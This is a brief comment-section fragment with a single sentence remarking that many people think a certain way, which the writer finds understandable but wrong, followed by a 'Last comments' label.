I guess lots of people are thinking like that, this is understandable but truly not the right way.
Last comments